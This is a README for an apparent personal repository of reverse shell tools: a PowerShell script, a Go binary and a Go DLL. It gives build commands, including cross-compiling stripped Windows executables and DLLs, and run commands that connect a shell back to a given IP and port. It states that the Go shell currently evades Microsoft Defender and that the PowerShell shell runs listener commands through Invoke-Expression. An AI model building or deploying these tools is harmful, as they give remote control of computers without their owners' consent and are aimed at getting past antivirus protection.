reverse-shells

README

My Reverse Shells

Powershell

Native PowerShell reverse shell to a netcat listener.

Supports commands up to 16384 bytes in length, if you need longer than modify the line where the System.Byte[] object is declared.

This passes all commands entered from the netcat listener to PowerShell's Invoke-Expression, so this supports powershell + cmd.exe commands. Errors are sent over the socket

Usage:

./pwsh_revshell.ps1 -ip 127.0.0.1 -port 3333

Golang

Golang reverse shell. Does runtime OS detection and selects proper shell for Windows, Mac, and Linux. Is not detected currently by Microsoft Defender. To Compile:

Linux:

go build -ldflags="-s -w" -o revshell revshell.go

Cross compile on Linux for Windows:

GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o revshell.exe revshell.go

To run, provide the IP address and port as command line arguments:

./revshell 127.0.0.1 3333

revshell.exe 127.0.0.1 3333

Golang DLL Reverse Shell

Golang DLL reverse shell designed to be run with rundll32.exe. This currently has the IP and port hardcoded. Modify the IP and port in the source code. To Compile:

Linux: You will need to install the following packages on Ubuntu

sudo apt install golang gcc build-essential gcc-mingw-w64-x86-64 gcc-mingw-w64-i686

Cross compile on Linux for Windows:

32 bit DLL

env GOOS=windows GOARCH=386 CGO_ENABLED=1 CC=i686-w64-mingw32-gcc go build -ldflags="-s -w" -buildmode=c-shared -o revshell32.dll revshell_dll.go

64 bit DLL

env GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -ldflags="-s -w" -buildmode=c-shared -o revshell64.dll revshell_dll.go

To run:

rundll32.exe C:\revshell32.dll,Entry